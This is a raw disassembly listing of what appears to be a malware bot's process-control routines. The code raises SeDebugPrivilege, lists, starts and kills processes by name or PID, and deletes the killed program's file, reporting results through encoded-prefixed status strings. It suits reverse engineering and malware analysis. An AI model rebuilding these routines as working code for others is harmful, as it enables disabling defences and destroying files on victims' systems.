push eax
call sub_4221F0
add esp, 18h
lea eax, [ebp+var_14]
neg esi
push eax
lea eax, [ebp+var_5C]
push eax
lea eax, [ebp+var_594]
push eax
push ebx
sbb esi, esi
push ebx
push ebx
and esi, 0FFFFFFFBh
push ebx
lea eax, [ebp+var_418]
push ebx
add esi, 5
push eax
push ebx
mov [ebp+var_5C], 44h
mov [ebp+var_30], edi
mov [ebp+var_2C], si
call dword_42F078 ; CreateProcessA
test eax, eax
jnz short loc_417E81
cmp [ebp+var_1E8], ebx
mov edi, dword_42F068
mov esi, offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
jnz short loc_417E4F
cmp [ebp+var_1E4], ebx
jnz short loc_417E57
call edi ; dword_42F068
push eax
lea eax, [ebp+var_418]
push eax
push esi
lea eax, [ebp+var_298]
push offset aSFailedToCre_0 ; "%s Failed to create proc: \"%s\",error: <"...
push eax
push [ebp+arg_0]
call sub_4104F6
add esp, 18h
loc_417E4F: ; CODE XREF: sub_417CD7+14C�j
cmp [ebp+var_1E4], ebx
jz short loc_417E79
loc_417E57: ; CODE XREF: sub_417CD7+154�j
call edi ; dword_42F068
push eax
lea eax, [ebp+var_418]
push eax
push esi
lea eax, [ebp+var_298]
push offset aSFailedToCre_0 ; "%s Failed to create proc: \"%s\",error: <"...
push eax
push [ebp+arg_0]
call sub_410491
add esp, 18h
loc_417E79: ; CODE XREF: sub_417CD7+BC�j
; sub_417CD7+DD�j ...
xor eax, eax
inc eax
jmp loc_418009
; ---------------------------------------------------------------------------
loc_417E81: ; CODE XREF: sub_417CD7+139�j
mov edi, dword_42F164
call edi ; dword_42F164
cmp [ebp+var_1E8], ebx
mov [ebp+var_4], eax
mov esi, offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
jnz short loc_417EC3
cmp [ebp+var_1E4], ebx
jnz short loc_417ECB
push [ebp+var_C]
lea eax, [ebp+var_418]
push eax
push esi
lea eax, [ebp+var_298]
push offset aSCreatedProcSP ; "%s Created proc: \"%s\", PID: <%d>"
push eax
push [ebp+arg_0]
call sub_4104F6
add esp, 18h
loc_417EC3: ; CODE XREF: sub_417CD7+1C0�j
cmp [ebp+var_1E4], ebx
jz short loc_417EED
loc_417ECB: ; CODE XREF: sub_417CD7+1C8�j
push [ebp+var_C]
lea eax, [ebp+var_418]
push eax
push esi
lea eax, [ebp+var_298]
push offset aSCreatedProcSP ; "%s Created proc: \"%s\", PID: <%d>"
push eax
push [ebp+arg_0]
call sub_410491
add esp, 18h
loc_417EED: ; CODE XREF: sub_417CD7+1F2�j
cmp [ebp+var_1E8], ebx
jnz loc_417FE1
cmp [ebp+var_18], ebx
jz loc_417FE1
push 0FFFFFFFFh
push [ebp+var_14]
call dword_42F064 ; WaitForSingleObject
call edi ; dword_42F164
sub eax, [ebp+var_4]
xor edx, edx
mov ecx, 3E8h
push 3Ch
div ecx
xor edx, edx
mov ecx, 15180h
pop edi
mov [ebp+var_314], bl
div ecx
mov ecx, 0E10h
mov eax, edx
xor edx, edx
div ecx
mov ecx, eax
mov eax, edx
xor edx, edx
div edi
cmp ecx, ebx
mov edi, edx
mov [ebp+var_4], eax
jbe short loc_417F81
cmp ecx, 1
mov eax, offset aHour ; " hour"
jz short loc_417F58
mov eax, offset aHours ; " hours"
loc_417F58: ; CODE XREF: sub_417CD7+27A�j
push eax
push ecx
lea eax, [ebp+var_490]
push offset aDS ; " %d%s"
push eax
call sub_422063
lea eax, [ebp+var_490]
push eax
lea eax, [ebp+var_314]
push eax
call sub_423270
add esp, 18h
loc_417F81: ; CODE XREF: sub_417CD7+270�j
push edi
lea eax, [ebp+var_490]
push [ebp+var_4]
push offset a_2d_2d ; " %.2d:%.2d"
push eax
call sub_422063
lea eax, [ebp+var_490]
push eax
lea eax, [ebp+var_314]
push eax
call sub_423270
add esp, 18h
lea eax, [ebp+var_314]
cmp [ebp+var_1E4], ebx
push eax
lea eax, [ebp+var_418]
push eax
lea eax, [ebp+var_298]
push esi
push offset aSProcsFinished ; "%s Procs Finished: \"%s\", Total Running "...
push eax
push [ebp+arg_0]
jnz short loc_417FD9
call sub_4104F6
jmp short loc_417FDE
; ---------------------------------------------------------------------------
loc_417FD9: ; CODE XREF: sub_417CD7+2F9�j
call sub_410491
loc_417FDE: ; CODE XREF: sub_417CD7+300�j
add esp, 18h
loc_417FE1: ; CODE XREF: sub_417CD7+21C�j
; sub_417CD7+225�j
cmp [ebp+var_14], ebx
mov esi, dword_42F038
jz short loc_417FF1
push [ebp+var_14]
call esi ; dword_42F038
loc_417FF1: ; CODE XREF: sub_417CD7+313�j
cmp [ebp+var_10], ebx
jz short loc_417FFB
push [ebp+var_10]
call esi ; dword_42F038
loc_417FFB: ; CODE XREF: sub_417CD7+31D�j
push [ebp+var_218]
call sub_41C059
pop ecx
xor eax, eax
loc_418009: ; CODE XREF: sub_417CD7+1A5�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_417CD7 endp
; =============== S U B R O U T I N E =======================================
sub_418010 proc near ; DATA XREF: sub_403B2C+1737�o
mov eax, offset loc_42EF34
call sub_423A68
mov eax, 1564h
call sub_4220C0
mov eax, [ebp+8]
push ebx
push esi
push edi
mov ecx, 90h
mov esi, eax
lea edi, [ebp-26Ch]
xor ebx, ebx
rep movsd
mov edi, [ebp-26Ch]
xor esi, esi
inc esi
cmp [ebp-1D8h], ebx
mov [eax+0BCh], esi
mov [ebp+8], edi
jz loc_4181EC
mov al, [ebp+0Bh]
push ebx
push ebx
lea ecx, [ebp-1Ch]
mov [ebp-1Ch], al
call sub_4199B0
mov [ebp-18h], eax
mov [ebp-14h], ebx
push dword ptr [ebp-1E0h]
lea eax, [ebp-1Ch]
mov [ebp-4], ebx
push eax
call sub_418436
pop ecx
test al, al
pop ecx
jz loc_418192
cmp [ebp-1B4h], ebx
mov esi, offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
lea eax, [ebp-268h]
push esi
push offset aSProcsList ; "%s Procs List:"
push eax
push edi
jnz short loc_4180AD
call sub_4104F6
jmp short loc_4180B2
; ---------------------------------------------------------------------------
loc_4180AD: ; CODE XREF: sub_418010+94�j
call sub_410491
loc_4180B2: ; CODE XREF: sub_418010+9B�j
add esp, 10h
cmp [ebp-1BCh], ebx
mov edi, offset aPidAMemoryUsag ; " PID - Memory Usage - Process"
jz short loc_4180DD
cmp [ebp-1B4h], ebx
jnz short loc_4180E5
lea eax, [ebp-268h]
push edi
push eax
push dword ptr [ebp+8]
call sub_4104F6
add esp, 0Ch
loc_4180DD: ; CODE XREF: sub_418010+B0�j
cmp [ebp-1B4h], ebx
jz short loc_4180F8
loc_4180E5: ; CODE XREF: sub_418010+B8�j
lea eax, [ebp-268h]
push edi
push eax
push dword ptr [ebp+8]
call sub_410491
add esp, 0Ch
loc_4180F8: ; CODE XREF: sub_418010+D3�j
mov eax, [ebp-18h]
mov edi, [eax]
cmp edi, eax
jz short loc_418169
loc_418101: ; CODE XREF: sub_418010+155�j
mov eax, [edi+108h]
lea ebx, [edi+10Ch]
push offset aK ; " K"
push ebx
mov [ebp-10h], eax
call sub_423270
lea eax, [edi+8]
push eax
push ebx
push dword ptr [ebp-10h]
lea eax, [ebp-1570h]
push offset a6d10sS ; " %-6d- %-10s- \"%s\""
push eax
call sub_422063
add esp, 1Ch
cmp dword ptr [ebp-1B4h], 0
lea eax, [ebp-1570h]
push eax
lea eax, [ebp-268h]
push eax
push dword ptr [ebp+8]
jnz short loc_418158
call sub_4104F6
jmp short loc_41815D
; ---------------------------------------------------------------------------
loc_418158: ; CODE XREF: sub_418010+13F�j
call sub_410491
loc_41815D: ; CODE XREF: sub_418010+146�j
mov edi, [edi]
add esp, 0Ch
cmp edi, [ebp-18h]
jnz short loc_418101
xor ebx, ebx
loc_418169: ; CODE XREF: sub_418010+EF�j
cmp [ebp-1B4h], ebx
lea eax, [ebp-268h]
push esi
push offset aSEndOfList ; "%s End of list"
push eax
push dword ptr [ebp+8]
jnz short loc_41818B
call sub_4104F6
loc_418186: ; CODE XREF: sub_418010+180�j
add esp, 10h
jmp short loc_4181DB
; ---------------------------------------------------------------------------
loc_41818B: ; CODE XREF: sub_418010+16F�j
call sub_410491
jmp short loc_418186
; ---------------------------------------------------------------------------
loc_418192: ; CODE XREF: sub_418010+75�j
cmp [ebp-1B4h], ebx
jnz short loc_4181BA
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
lea eax, [ebp-268h]
push offset aSUnableToListP ; "%s Unable to list procs,error: <%d>"
push eax
push edi
call sub_4104F6
jmp short loc_4181D8
; ---------------------------------------------------------------------------
loc_4181BA: ; CODE XREF: sub_418010+188�j
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
lea eax, [ebp-268h]
push offset aSUnableToListP ; "%s Unable to list procs,error: <%d>"
push eax
push edi
call sub_410491
loc_4181D8: ; CODE XREF: sub_418010+1A8�j
add esp, 14h
loc_4181DB: ; CODE XREF: sub_418010+179�j
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp-1Ch]
call sub_419912
jmp loc_418408
; ---------------------------------------------------------------------------
loc_4181EC: ; CODE XREF: sub_418010+43�j
cmp [ebp-1D4h], ebx
jz loc_418408
cmp [ebp-1D0h], ebx
jnz loc_4182F5
lea eax, [ebp-2Ch]
push eax
push dword ptr [ebp-1E4h]
call sub_418614
pop ecx
test al, al
pop ecx
jz short loc_418269
cmp [ebp-1B8h], ebx
mov esi, offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
mov edi, offset aSProSKilledTot ; "%s Pro \"%s\" killed,total: <%s>"
jnz short loc_418251
cmp [ebp-1B4h], ebx
jnz short loc_41825D
lea eax, [ebp-2Ch]
push eax
lea eax, [ebp-268h]
push dword ptr [ebp-1E4h]
push esi
push edi
push eax
push dword ptr [ebp+8]
call sub_4104F6
add esp, 18h
loc_418251: ; CODE XREF: sub_418010+219�j
cmp [ebp-1B4h], ebx
jz loc_418408
loc_41825D: ; CODE XREF: sub_418010+221�j
lea eax, [ebp-2Ch]
push eax
push dword ptr [ebp-1E4h]
jmp short loc_4182D2
; ---------------------------------------------------------------------------
loc_418269: ; CODE XREF: sub_418010+207�j
push dword ptr [ebp-1E4h]
call sub_422B5A
push eax
call sub_4188DB
pop ecx
mov esi, offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
test eax, eax
pop ecx
jz short loc_4182EB
mov edi, offset aSPidIKilled ; "%s PID \"%i\" killed"
loc_41828A: ; CODE XREF: sub_418010+421�j
cmp [ebp-1B8h], ebx
jnz short loc_4182BA
cmp [ebp-1B4h], ebx
jnz short loc_4182C6
push dword ptr [ebp-1E4h]
call sub_422B5A
push eax
push esi
lea eax, [ebp-268h]
push edi
push eax
push dword ptr [ebp+8]
call sub_4104F6
add esp, 18h
loc_4182BA: ; CODE XREF: sub_418010+280�j
cmp [ebp-1B4h], ebx
jz loc_418408
loc_4182C6: ; CODE XREF: sub_418010+288�j
push dword ptr [ebp-1E4h]
call sub_422B5A
push eax
loc_4182D2: ; CODE XREF: sub_418010+257�j
push esi
lea eax, [ebp-268h]
push edi
push eax
push dword ptr [ebp+8]
call sub_410491
add esp, 18h
jmp loc_418408
; ---------------------------------------------------------------------------
loc_4182EB: ; CODE XREF: sub_418010+273�j
mov edi, offset aSFailedToKillP ; "%s Failed to kill proc"
jmp loc_4183C8
; ---------------------------------------------------------------------------
loc_4182F5: ; CODE XREF: sub_418010+1EE�j
lea eax, [ebp-370h]
push eax
push dword ptr [ebp-1E4h]
call sub_422B5A
pop ecx
push eax
call sub_418930
push eax
lea eax, [ebp-370h]
push offset aS_1 ; "%s"
push eax
call sub_422063
lea eax, [ebp-570h]
push eax
lea eax, [ebp-470h]
push eax
push ebx
lea eax, [ebp-370h]
push ebx
push eax
call sub_4245FD
lea eax, [ebp-570h]
push eax
lea eax, [ebp-470h]
push eax
call sub_423270
add esp, 30h
xor edi, edi
mov [ebp-10h], ebx
loc_418357: ; CODE XREF: sub_418010+3AC�j
push dword ptr [ebp-1E4h]
call sub_422B5A
push eax
call sub_4188DB
pop ecx
test eax, eax
pop ecx
jz short loc_418370
mov edi, esi
loc_418370: ; CODE XREF: sub_418010+35C�j
lea eax, [ebp-370h]
push 80h
push eax
call dword_42F08C ; SetFileAttributesA
lea eax, [ebp-370h]
push eax
call dword_42F088 ; DeleteFileA
test eax, eax
jnz loc_418427
cmp edi, ebx
jz short loc_4183AA
lea eax, [ebp-470h]
push ebx
push eax
call sub_418614
pop ecx
pop ecx
loc_4183AA: ; CODE XREF: sub_418010+389�j
push 3E8h
call dword_42F15C ; Sleep
inc dword ptr [ebp-10h]
cmp dword ptr [ebp-10h], 5
jl short loc_418357
mov esi, offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
mov edi, offset aSFailedToKillA ; "%s Failed to kill and erase proc"
loc_4183C8: ; CODE XREF: sub_418010+2E0�j
cmp [ebp-1B8h], ebx
jnz short loc_4183EC
cmp [ebp-1B4h], ebx
jnz short loc_4183F4
push esi
lea eax, [ebp-268h]
push edi
push eax
push dword ptr [ebp+8]
call sub_4104F6
add esp, 10h
loc_4183EC: ; CODE XREF: sub_418010+3BE�j
cmp [ebp-1B4h], ebx
jz short loc_418408
loc_4183F4: ; CODE XREF: sub_418010+3C6�j
push esi
lea eax, [ebp-268h]
push edi
push eax
push dword ptr [ebp+8]
call sub_410491
add esp, 10h
loc_418408: ; CODE XREF: sub_418010+1D7�j
; sub_418010+1E2�j ...
push dword ptr [ebp-1E8h]
call sub_41C059
pop ecx
pop edi
mov ecx, [ebp-0Ch]
pop esi
xor eax, eax
pop ebx
mov large fs:0, ecx
leave
retn 4
; ---------------------------------------------------------------------------
loc_418427: ; CODE XREF: sub_418010+381�j
mov esi, offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
mov edi, offset aSPidIKilledAnd ; "%s PID \"%i\" killed and deleted"
jmp loc_41828A
sub_418010 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418436 proc near ; CODE XREF: sub_418010+6C�p
var_15CC = byte ptr -15CCh
var_5CC = byte ptr -5CCh
var_3CC = byte ptr -3CCh
var_2CC = byte ptr -2CCh
var_1CC = dword ptr -1CCh
var_1C8 = byte ptr -1C8h
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_44 = byte ptr -44h
var_38 = dword ptr -38h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 15CCh
call sub_4220C0
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_15CC]
push 1000h
push eax
call dword_45430C
test eax, eax
jnz short loc_418461
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_418461: ; CODE XREF: sub_418436+25�j
mov eax, [ebp+var_8]
push edi
shr eax, 2
mov [ebp+var_10], eax
mov eax, dword_43E558
push 3Fh
mov [ebp+var_148], eax
mov eax, dword_43E55C
pop ecx
push 0
mov [ebp+var_144], eax
pop eax
lea edi, [ebp+var_140]
rep stosd
mov [ebp+var_4], eax
jz loc_41860F
push ebx
push esi
mov ebx, offset aS_1 ; "%s"
loc_41849F: ; CODE XREF: sub_418436+1D1�j
mov eax, [ebp+var_4]
lea esi, [ebp+eax*4+var_15CC]
push dword ptr [esi]
push 0
push 410h
call dword_42F0E4 ; OpenProcess
mov edi, eax
test edi, edi
jz loc_4185FE
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_C]
push 4
push eax
push edi
call dword_4542D0
test eax, eax
jz loc_4185F7
lea eax, [ebp+var_148]
push 104h
push eax
push [ebp+var_C]
push edi
call dword_4542CC
lea eax, [ebp+var_148]
push eax
lea eax, [ebp+var_2CC]
push ebx
push eax
call sub_422063
mov eax, [esi]
add esp, 0Ch
mov [ebp+var_1CC], eax
lea eax, [ebp+var_44]
push 28h
push eax
push edi
call dword_454364
test eax, eax
jz short loc_418547
mov eax, [ebp+var_38]
push 0
shr eax, 0Ah
push eax
call sub_41F537
push eax
push ebx
lea eax, [ebp+var_1C8]
push 80h
push eax
call sub_42219B
add esp, 18h
jmp short loc_418567
; ---------------------------------------------------------------------------
loc_418547: ; CODE XREF: sub_418436+E9�j
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset aErrorD ; "Error: <%d>"
lea eax, [ebp+var_1C8]
push 80h
push eax
call sub_42219B
add esp, 10h
loc_418567: ; CODE XREF: sub_418436+10F�j
xor eax, eax
cmp [ebp+arg_4], eax
jz short loc_4185E0
lea ecx, [ebp+var_3CC]
push ecx
lea ecx, [ebp+var_5CC]
push ecx
push eax
push eax
lea eax, [ebp+var_2CC]
push eax
call sub_4245FD
lea eax, [ebp+var_3CC]
push eax
lea eax, [ebp+var_5CC]
push eax
call sub_423270
lea eax, [ebp+var_5CC]
push eax
push [ebp+arg_4]
push offset aSS_3 ; "%s / %s\n"
push offset dword_449470
call sub_424744
add esp, 2Ch
lea eax, [ebp+var_5CC]
push eax
push [ebp+arg_4]
call dword_42F070 ; lstrcmpiA
test eax, eax
jnz short loc_4185F7
mov ecx, [ebp+arg_0]
lea edx, [ebp+var_2CC]
push edx
mov eax, [ecx+4]
push eax
lea eax, [ebp+var_18]
jmp short loc_4185F1
; ---------------------------------------------------------------------------
loc_4185E0: ; CODE XREF: sub_418436+136�j
mov ecx, [ebp+arg_0]
lea edx, [ebp+var_2CC]
push edx
mov eax, [ecx+4]
push eax
lea eax, [ebp+var_14]
loc_4185F1: ; CODE XREF: sub_418436+1A8�j
push eax
call sub_41993D
loc_4185F7: ; CODE XREF: sub_418436+9F�j
; sub_418436+195�j
push edi
call dword_42F038 ; CloseHandle
loc_4185FE: ; CODE XREF: sub_418436+86�j
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+var_10]
jb loc_41849F
pop esi
pop ebx
loc_41860F: ; CODE XREF: sub_418436+5C�j
mov al, 1
pop edi
leave
retn
sub_418436 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418614 proc near ; CODE XREF: sub_403B2C+66FA�p
; sub_418010+1FE�p ...
var_1148 = dword ptr -1148h
var_148 = byte ptr -148h
var_44 = byte ptr -44h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1148h
call sub_4220C0
push ebx
push esi
push 10h
lea eax, [ebp+var_8]
pop esi
xor ebx, ebx
push eax
push ebx
push 28h
mov [ebp+var_1], bl
mov [ebp+var_1C], esi
call dword_42F100 ; GetCurrentThread
push eax
call dword_454248 ; OpenThreadToken
test eax, eax
jnz short loc_418660
lea eax, [ebp+var_8]
push eax
push 28h
call dword_42F040 ; GetCurrentProcess
push eax
call dword_4542F8 ; OpenProcessToken
test eax, eax
jnz short loc_418660
mov [ebp+var_8], ebx
loc_418660: ; CODE XREF: sub_418614+30�j
; sub_418614+47�j
cmp [ebp+var_8], ebx
jz short loc_4186B7
lea eax, [ebp+var_30]
mov [ebp+var_34], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push ebx
mov [ebp+var_28], 2
call dword_4542C4 ; LookupPrivilegeValueA
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_34]
push esi
push eax
push ebx
push [ebp+var_8]
call dword_454378 ; AdjustTokenPrivileges
test eax, eax
jz short loc_4186AB
call dword_42F068 ; RtlGetLastWin32Error
cmp eax, 514h
jnz short loc_4186B7
loc_4186AB: ; CODE XREF: sub_418614+88�j
push [ebp+var_8]
call dword_42F038 ; CloseHandle
mov [ebp+var_8], ebx
loc_4186B7: ; CODE XREF: sub_418614+4F�j
; sub_418614+95�j
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_1148]
push 1000h
push eax
call dword_45430C
test eax, eax
jnz short loc_4186D8
xor al, al
jmp loc_41880E
; ---------------------------------------------------------------------------
loc_4186D8: ; CODE XREF: sub_418614+BB�j
mov esi, [ebp+var_18]
mov [ebp+var_10], ebx
shr esi, 2
mov [ebp+var_24], esi
mov [ebp+var_C], ebx
jz loc_4187D3
push edi
loc_4186EE: ; CODE XREF: sub_418614+1B8�j
lea eax, [ebp+var_148]
push offset aUnknown ; "unknown"
push eax
call dword_42F04C ; lstrcpyA
mov eax, [ebp+var_C]
push [ebp+eax*4+var_1148]
push ebx
push 411h
call dword_42F0E4 ; OpenProcess
mov edi, eax
cmp edi, ebx
jz loc_4187C6
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push 4
push eax
push edi
call dword_4542D0
test eax, eax
jz loc_4187BF
lea eax, [ebp+var_148]
push 104h
push eax
push [ebp+var_20]
push edi
call dword_454224
lea eax, [ebp+var_148]
mov [ebp+var_14], ebx
push eax
call sub_422120
test eax, eax
pop ecx
jbe short loc_418791
mov eax, [ebp+var_C]
lea esi, [ebp+eax+var_148]
loc_41876D: ; CODE XREF: sub_418614+178�j
movsx eax, byte ptr [esi]
push eax
call sub_4248E0
inc [ebp+var_14]
mov [esi], al
lea eax, [ebp+var_148]
push eax
call sub_422120
cmp [ebp+var_14], eax
pop ecx
pop ecx
jb short loc_41876D
mov esi, [ebp+var_24]
loc_418791: ; CODE XREF: sub_418614+14D�j
cmp [ebp+arg_0], ebx
jnz short loc_41879B
mov [ebp+var_1], bl
jmp short loc_4187BF
; ---------------------------------------------------------------------------
loc_41879B: ; CODE XREF: sub_418614+180�j
push [ebp+arg_0]
lea eax, [ebp+var_148]
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_4187BF
inc [ebp+var_10]
push ebx
push edi
call dword_42F0EC ; TerminateProcess
mov [ebp+var_1], 1
loc_4187BF: ; CODE XREF: sub_418614+11F�j
; sub_418614+185�j ...
push edi
call dword_42F038 ; CloseHandle
loc_4187C6: ; CODE XREF: sub_418614+106�j
inc [ebp+var_C]
cmp [ebp+var_C], esi
jb loc_4186EE
pop edi
loc_4187D3: ; CODE XREF: sub_418614+D3�j
cmp [ebp+arg_4], ebx
jz short loc_4187EB
push [ebp+var_10]
push offset aI_1 ; "%i"
push [ebp+arg_4]
call sub_422063
add esp, 0Ch
loc_4187EB: ; CODE XREF: sub_418614+1C2�j
cmp [ebp+var_8], ebx
jz short loc_41880B
push ebx
push ebx
lea eax, [ebp+var_44]
push 10h
push eax
push ebx
push [ebp+var_8]
call dword_454378 ; AdjustTokenPrivileges
push [ebp+var_8]
call dword_42F038 ; CloseHandle
loc_41880B: ; CODE XREF: sub_418614+1DA�j
mov al, [ebp+var_1]
loc_41880E: ; CODE XREF: sub_418614+BF�j
pop esi
pop ebx
leave
retn
sub_418614 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418812 proc near ; CODE XREF: sub_4188DB+12�p
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
xor edi, edi
push esi
push edi
push 28h
mov [ebp+var_8], 10h
mov [ebp+var_4], edi
call dword_42F100 ; GetCurrentThread
push eax
call dword_454248 ; OpenThreadToken
test eax, eax
jnz short loc_418855
push esi
push 28h
call dword_42F040 ; GetCurrentProcess
push eax
call dword_4542F8 ; OpenProcessToken
test eax, eax
jnz short loc_418855
mov [esi], edi
loc_418855: ; CODE XREF: sub_418812+2B�j
; sub_418812+3F�j
cmp [esi], edi
jz short loc_4188AC
lea eax, [ebp+var_14]
xor ebx, ebx
push eax
inc ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
push edi
mov [ebp+var_18], ebx
mov [ebp+var_C], 2
call dword_4542C4 ; LookupPrivilegeValueA
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push [ebp+arg_4]
push 10h
push eax
push edi
push dword ptr [esi]
call dword_454378 ; AdjustTokenPrivileges
test eax, eax
jz short loc_4188A2
call dword_42F068 ; RtlGetLastWin32Error
cmp eax, 514h
jz short loc_4188A2
mov [ebp+var_4], ebx
jmp short loc_4188AC
; ---------------------------------------------------------------------------
loc_4188A2: ; CODE XREF: sub_418812+7C�j
; sub_418812+89�j
push dword ptr [esi]
call dword_42F038 ; CloseHandle
mov [esi], edi
loc_4188AC: ; CODE XREF: sub_418812+45�j
; sub_418812+8E�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_418812 endp
; =============== S U B R O U T I N E =======================================
sub_4188B4 proc near ; CODE XREF: sub_4188DB+47�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
xor ecx, ecx
mov eax, [esi]
cmp eax, ecx
jz short loc_4188D9
push ecx
push ecx
push 10h
push [esp+10h+arg_4]
push ecx
push eax
call dword_454378 ; AdjustTokenPrivileges
push dword ptr [esi]
call dword_42F038 ; CloseHandle
loc_4188D9: ; CODE XREF: sub_4188B4+B�j
pop esi
retn
sub_4188B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4188DB proc near ; CODE XREF: sub_418010+265�p
; sub_418010+353�p ...
var_14 = byte ptr -14h
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_4]
xor ebx, ebx
push eax
call sub_418812
pop ecx
pop ecx
push [ebp+arg_0]
push ebx
push 411h
call dword_42F0E4 ; OpenProcess
mov esi, eax
cmp esi, ebx
jz short loc_41891A
push ebx
push esi
call dword_42F0EC ; TerminateProcess
push esi
mov bl, 1
call dword_42F038 ; CloseHandle
loc_41891A: ; CODE XREF: sub_4188DB+2C�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
call sub_4188B4
pop ecx
pop ecx
pop esi
movzx eax, bl
pop ebx
leave
retn
sub_4188DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418930 proc near ; CODE XREF: sub_418010+2F9�p
var_1114 = byte ptr -1114h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1114h
call sub_4220C0
push ebx
push esi
lea eax, [ebp+var_C]
push edi
push eax
lea eax, [ebp+var_1114]
push 1000h
push eax
call dword_45430C
test eax, eax
jz loc_418A16
mov eax, dword_43E558
mov ebx, [ebp+var_C]
push 3Fh
mov [ebp+var_114], eax
mov eax, dword_43E55C
pop ecx
mov [ebp+var_110], eax
push offset a??? ; "???"
push [ebp+arg_4]
xor eax, eax
lea edi, [ebp+var_10C]
rep stosd
shr ebx, 2
call dword_42F04C ; lstrcpyA
xor edi, edi
test ebx, ebx
jbe short loc_418A13
loc_41899B: ; CODE XREF: sub_418930+B0�j
lea esi, [ebp+edi*4+var_1114]
push dword ptr [esi]
push 0
push 410h
call dword_42F0E4 ; OpenProcess
test eax, eax
mov [ebp+var_4], eax
jz short loc_4189DD
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push 4
push ecx
push eax
call dword_4542D0
test eax, eax
jz short loc_4189D4
mov eax, [ebp+arg_0]
cmp eax, [esi]
jz short loc_4189E4
loc_4189D4: ; CODE XREF: sub_418930+9B�j
push [ebp+var_4]
call dword_42F038 ; CloseHandle
loc_4189DD: ; CODE XREF: sub_418930+86�j
inc edi
cmp edi, ebx
jb short loc_41899B
jmp short loc_418A13
; ---------------------------------------------------------------------------
loc_4189E4: ; CODE XREF: sub_418930+A2�j
lea eax, [ebp+var_114]
push 104h
push eax
push [ebp+var_8]
push [ebp+var_4]
call dword_4542CC
lea eax, [ebp+var_114]
push eax
push offset aS_1 ; "%s"
push [ebp+arg_4]
call sub_422063
add esp, 0Ch
loc_418A13: ; CODE XREF: sub_418930+69�j
; sub_418930+B2�j
mov eax, [ebp+arg_4]
loc_418A16: ; CODE XREF: sub_418930+28�j
pop edi
pop esi
pop ebx
leave
retn
sub_418930 endp
; =============== S U B R O U T I N E =======================================
sub_418A1B proc near ; CODE XREF: start+87�p
; sub_403B2C+142A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push 32h
mov esi, offset dword_45C3AC
push 0
push esi
call sub_4221F0
mov eax, [esp+18h+arg_0]
mov edi, 3E8h
xor edx, edx
mov ecx, edi
div ecx
xor edx, edx
add esp, 0Ch
push 3Ch
pop ebx
mov ecx, eax
mov eax, [esp+0Ch+arg_4]
div edi
xor edx, edx
mov edi, 0E10h
sub ecx, eax
mov eax, ecx
mov ecx, 15180h
div ecx
mov ecx, eax
mov eax, edx
xor edx, edx
div edi
mov edi, eax
mov eax, edx
